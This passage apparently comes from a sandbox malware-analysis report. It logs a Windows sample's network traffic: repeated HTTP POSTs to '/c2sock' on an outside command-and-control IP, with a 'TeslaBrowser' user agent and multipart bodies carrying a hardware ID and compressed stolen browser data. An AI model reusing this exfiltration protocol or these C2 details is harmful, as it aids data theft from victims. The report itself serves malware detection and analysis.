                                                          Nov 13, 2024 10:53:27.685446024 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.685549974 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.733386993 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.733494997 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.781445980 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.781555891 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:27.829394102 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:27.829482079 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.092742920 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.092859983 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.097835064 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.097898006 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.149610043 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.149738073 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.201461077 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.201673031 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.249500036 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.249629974 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.301632881 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.301702023 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.353662014 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.353791952 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.401628017 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.401710033 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.449501038 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.449615002 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.501415014 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.501529932 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.549529076 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.549645901 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.597532988 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.597598076 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.648283005 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.648361921 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.697678089 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.697788000 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.745646000 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.745795012 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.793387890 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.793515921 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.841382980 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.841527939 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.890459061 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.890542984 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.943233013 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.943386078 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:28.991347075 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:28.991489887 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.045402050 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.045557976 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.093673944 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.093803883 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.145668030 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.145859957 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.193464041 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.193542957 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.241625071 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.241816044 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.290572882 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.290700912 CET4999080192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.321274996 CET804999094.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.591622114 CET4999180192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.596617937 CET804999194.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.596743107 CET4999180192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.596995115 CET4999180192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.597378969 CET4999180192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:29.601799965 CET804999194.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:29.602308989 CET804999194.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:38.220848083 CET804999194.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:38.222316027 CET4999180192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:38.253362894 CET4999180192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:38.258558035 CET804999194.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:38.528826952 CET4999380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:38.534307003 CET804999394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:38.534496069 CET4999380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:38.534646988 CET4999380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:38.535351038 CET4999380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:38.539576054 CET804999394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:38.540415049 CET804999394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:47.017457962 CET804999394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:47.017589092 CET4999380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:47.017746925 CET4999380192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:47.022785902 CET804999394.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:47.411478996 CET4999480192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:47.416503906 CET804999494.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:47.416596889 CET4999480192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:47.416708946 CET4999480192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:47.417144060 CET4999480192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:47.421495914 CET804999494.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:47.422003031 CET804999494.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:56.106674910 CET804999494.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:56.106852055 CET4999480192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:56.107063055 CET4999480192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:56.112597942 CET804999494.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:56.384577990 CET4999580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:56.518012047 CET804999594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:56.518100023 CET4999580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:56.518299103 CET4999580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:56.518840075 CET4999580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:53:56.523082018 CET804999594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:53:56.523637056 CET804999594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:05.000678062 CET804999594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:05.000873089 CET4999580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:05.000937939 CET4999580192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:05.005985022 CET804999594.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:05.344310999 CET4999680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:05.349428892 CET804999694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:05.349545002 CET4999680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:05.349737883 CET4999680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:05.350265980 CET4999680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:05.354568005 CET804999694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:05.355093002 CET804999694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:13.834688902 CET804999694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:13.834770918 CET4999680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:13.834832907 CET4999680192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:13.839735985 CET804999694.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:14.122622013 CET4999780192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:14.127614021 CET804999794.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:14.127687931 CET4999780192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:14.127818108 CET4999780192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:14.128194094 CET4999780192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:14.132627964 CET804999794.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:14.132999897 CET804999794.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:22.617595911 CET804999794.158.244.69192.168.2.6
                                                          Nov 13, 2024 10:54:22.617837906 CET4999780192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:22.617837906 CET4999780192.168.2.694.158.244.69
                                                          Nov 13, 2024 10:54:22.622699022 CET804999794.158.244.69192.168.2.6
                                                          • 94.158.244.69
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.64980594.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:52:17.520049095 CET190OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 16815
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:52:17.520529985 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:52:17.525151014 CET1236OUTData Raw: 24 d1 70 17 55 8a e1 a7 ef b0 09 eb 87 c2 ff 92 d6 c3 33 a2 34 3b 9b 39 28 46 8c 45 c5 5b ae 83 59 29 3e f4 5c ac 21 19 95 91 c7 98 49 40 6a d1 a6 ed ce 6b 36 b3 86 f8 e2 cc e7 f7 c3 b3 9e 3f 91 fb db 90 88 41 d8 4d 33 92 44 a1 d0 da fe ae 28 cd
                                                          Data Ascii: $pU34;9(FE[Y)>\!I@jk6?AM3D(ey9zqs2X&luuDS[_{GN]BT<tph|n`MY|z=5iFO3:5AkQg } }
                                                          Nov 13, 2024 10:52:17.525465012 CET4455OUTData Raw: e9 03 fb 7f 00 00 00 20 7d 60 ff 0f 00 00 00 a4 0f ec ff 01 00 00 80 f4 81 f5 1f 00 00 00 48 1f 58 ff 01 00 00 80 f4 81 df ff 01 00 00 80 f4 91 1f 78 47 c8 65 35 41 fc fb dc 7f e5 16 b2 5a ff 5f 0e d4 04 00 c0 b7 c5 c1 fc c7 a2 f4 f4 69 e6 e5 a6
                                                          Data Ascii: }`HXxGe5AZ_i&k6=iU=vLj*dcfqTWH#P-RkRB])>t'+&=YhNgKPAvxUxqE;I5/kPNi


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.64985694.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:52:26.642975092 CET190OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 19049
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:52:26.643377066 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:52:26.648325920 CET1236OUTData Raw: 92 a0 58 f3 ed 03 7d f8 71 d4 73 a0 31 77 1c d2 0f 8a 04 83 c4 21 34 0d b6 59 51 64 92 42 77 65 31 14 88 6e 95 5c 65 c2 42 30 1a 3a 5b f3 9d dd d5 b3 42 eb fc f9 ea 9e 3d 1c 6f 58 bc 0d a9 26 dc d0 3c 87 6e d3 43 01 cb f9 51 66 3a 1a 3a 4b ee 76
                                                          Data Ascii: X}qs1w!4YQdBwe1n\eB0:[B=oX&<nCQf::Kv~3>W!2{mEzCt.}#g\q!/-Q<q?8~3+r\*PV N~$biw%uBuL%b%gs)gKoGx+
                                                          Nov 13, 2024 10:52:26.648451090 CET2472OUTData Raw: 6f 65 e2 0d ba fb ee b2 e1 e9 a8 47 82 f0 e0 07 b7 03 68 98 c0 0f 8e 70 e3 1c c5 a0 ed 70 54 dc 83 98 b3 67 33 0f cf 43 af aa 47 f9 81 3e aa ad 3b 77 b4 46 6b f3 72 59 13 71 57 d7 41 0a 6d 1d 7b c9 74 df 2d 8f 7b f5 91 a9 0a ad cb 97 0f bc 18 97
                                                          Data Ascii: oeGhppTg3CG>;wFkrYqWAm{t-{K,)Z?F_Q/H8/M;/I--<v?=w_q`$(Yyi.oN d'rImA"H/(" Ad? GA 2A
                                                          Nov 13, 2024 10:52:26.648494005 CET2472OUTData Raw: a0 fa 3f ab 7f a5 f2 87 20 f0 93 f2 e1 93 cd 8d 6b cd da ea 8b 2f 9e a0 9a 62 bb cc 54 44 9f ba ba a8 49 be 24 12 57 97 45 4b a6 92 6e 7b 32 b3 3c 77 d3 a3 de 4e 78 2e 08 53 16 13 9a 06 db cc 8d a3 2d 16 27 e7 68 d4 ab ec 55 ae 8f 23 da 57 86 31
                                                          Data Ascii: ? k/bTDI$WEKn{2<wNx.S-'hU#W1m}w~"-aea7k6dK.1Q-/)|#rm>X.Yk*eTt5EA d(IL\nA?fjV++Yt{7YnL&_#I
                                                          Nov 13, 2024 10:52:26.648526907 CET1745OUTData Raw: 57 e3 a3 f1 3e 5a 05 00 00 00 00 00 00 80 cb 30 9b d6 cb 86 ed 75 a3 6a 93 13 95 07 fa 15 34 6b 5f 95 05 a3 ca aa 1b 76 b7 b8 28 e6 26 f4 a2 11 17 b8 a5 eb 4b d3 fd c2 dc c8 08 83 3e 8b 8f 32 09 3d 3f 7d b6 35 a5 e9 73 d3 dd 2e f3 ad 40 32 19 06
                                                          Data Ascii: W>Z0uj4k_v(&K>2=?}5s.@2w'?&d0TzYs ZLD^_Tz^'nsG*?"p~PK#m.PPK&mYEdge/Default/Bro


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.64990394.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:52:35.650890112 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:52:35.651307106 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.64995694.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:52:44.649811029 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:52:44.650234938 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.64998694.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:52:53.432670116 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:52:53.433115005 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.64998894.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:02.688122988 CET190OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 19892
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:02.688472986 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:53:02.693331957 CET1236OUTData Raw: 87 ad 4a 3b 6b 6f 67 f5 a4 b5 1a a5 fc 5c dc dc 8d 2b ef 7d 00 f4 3c c3 da 67 99 98 78 ec dd c3 e3 e7 26 77 9a 6d bd 2d eb 4c b4 de 98 3b 56 53 ef ca 8c 9f 3c da bb 7e ac 25 5d 2d 47 c3 dc 59 1e fb 27 dd be ed 46 1e 50 b2 7b 33 6f 4a ce 1d 6c bf
                                                          Data Ascii: J;kog\+}<gx&wm-L;VS<~%]-GY'FP{3oJlsMs+IE+KhEo&Vo?{jwy-lqo+ssK>IpccwVR#Z:7sl$eMmvZ6Fgm}
                                                          Nov 13, 2024 10:53:02.693434000 CET4944OUTData Raw: ad d5 dc 76 da d9 e5 73 27 8f 2d 2d 9e ca df a8 94 0e dd fe ec e2 67 1e 4d 06 ab 17 92 51 8f 9f 0a 8e f7 9c 39 db 73 e6 3e ff db fd d1 cb b3 47 e7 5a 8d 66 6d b1 7c a3 34 d9 ed ee f6 e5 d4 2a 8d c9 e8 8a 9a b5 6a 63 b2 50 2d 76 bb b9 f1 58 cf 20
                                                          Data Ascii: vs'--gMQ9s>GZfm|4*jcP-vX tkQg3t|UiNYJZ#3NO]>;p{|]RVl5O>W?9RN;X<wWFA(
                                                          Nov 13, 2024 10:53:02.693460941 CET2588OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.64998994.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:11.645047903 CET189OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 1137
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:11.645447016 CET1137OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.64999094.158.244.69802052C:\Users\user\Desktop\Vd3tOP5WSD.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:53:20.838767052 CET191OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 577816
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:53:20.839282036 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:53:20.843975067 CET1236OUTData Raw: a1 fe e7 de 11 5c b7 eb 6d 59 8f ff 95 72 d6 09 da 1c 30 6b 9d 5f ad fe 97 3d 4e 2f 4b bc bf 1c ed ef 35 3c d0 b4 be f0 5e 4b ed de 40 9b 9f e5 f6 be 72 c2 7b db 67 ca 75 f4 18 07 cf ed 6f e9 27 0e ea 00 f9 be 5f dd ff 6b ec ff 58 7b 77 a9 ae ac
                                                          Data Ascii: \mYr0k_=N/K5<^K@r{guo'_kX{wpw9~}c{wJI\sn/;J5*qgrbwNYu[[Z7:egTxhrCEZ-cYz])Yrm,r,?WV,\\.$f_R43e
                                                          Nov 13, 2024 10:53:20.844213009 CET2472OUTData Raw: 4d 3b ae 57 62 d2 fc 4f 1b 5e 10 6e 7c 64 7f f0 3f 9b 0d 86 2e 78 64 af c4 c0 fb 6c e7 e0 7f 3c 2e fb 33 cf 65 ae ff 1b da 27 ac f7 e3 f6 17 86 b9 9f 19 6d 80 81 f9 c1 fb 26 1c d6 47 bf 52 b4 0d d2 79 ba 4e c6 c7 82 f3 66 70 7d 2c d5 13 52 0c fb
                                                          Data Ascii: M;WbO^n|d?.xdl<.3e'm&GRyNfp},R3?u>[Y@sU[3<x<i+?h@xG5}u}ypB^C/o}`zAE13/fU'''''':LkgSJs
                                                          Nov 13, 2024 10:53:20.844244957 CET4944OUTData Raw: 3d c1 e6 7b bd 0b 84 f5 f9 a2 7e 0f fe 47 be 87 f3 b0 3e f8 1e bd 4e 18 d2 3f f4 3f 6e 86 30 3f 18 20 fc 8f 1c 8f f7 01 73 13 b4 9d e3 b5 81 a6 ff d1 39 7d 5f 50 d3 87 ba 3e 6e 78 74 cd ec f7 e5 7e 67 f6 ff 92 e7 99 7b 7e 31 1f 90 cf 00 e4 e9 24
                                                          Data Ascii: ={~G>N??n0? s9}_P>nxt~g{~1$kwWi>''''''''''''''=xma=|oqWbA|t{_V{^_>Gi& c6~xeJ>>+H'<@5|
                                                          Nov 13, 2024 10:53:20.844288111 CET7416OUTData Raw: 1b ec 7f 59 3f d7 a9 fe d7 cc 5e df 76 f7 bf 46 f4 ff a6 de 5b 80 ff 71 eb eb 04 ff 8b 38 60 37 f7 3f 99 ff 97 df ff 74 82 bd c0 b5 ee 07 ee 2e fe e7 da 0b 4c f7 50 e0 7f b5 3a 60 bd fe f7 f2 79 a5 c4 88 ff 15 ef 7f 79 2c b0 27 f5 ff da 1d 50 fa
                                                          Data Ascii: Y?^vF[q8`7?t.LP:`yy,'P;7;?`f~X`~M`Wfa_lk__V3aw0?P{=K?@3xE{{|`!}!l>5T
                                                          Nov 13, 2024 10:53:20.844338894 CET2472OUTData Raw: b3 03 2d fe 67 db ff cb fb 7f f9 31 59 1f f9 1f 82 1a 40 d4 03 72 fb a3 63 3e 2f 10 bd c1 49 3d c0 f0 3c da e3 81 70 e3 e3 fb 7e f9 bd e6 7e 60 5e a3 07 eb e3 fb 7e 5d 75 7c f4 0a ff a3 f9 7f 14 ea ef a5 dd bf fc 5e cc fd a3 f3 74 3f fa 76 cd 39
                                                          Data Ascii: -g1Y@rc>/I=<p~~`^~]u|^t?v9~@"-%%gE|WOOa_koq12`A[y57k9g?\=Yo1j-
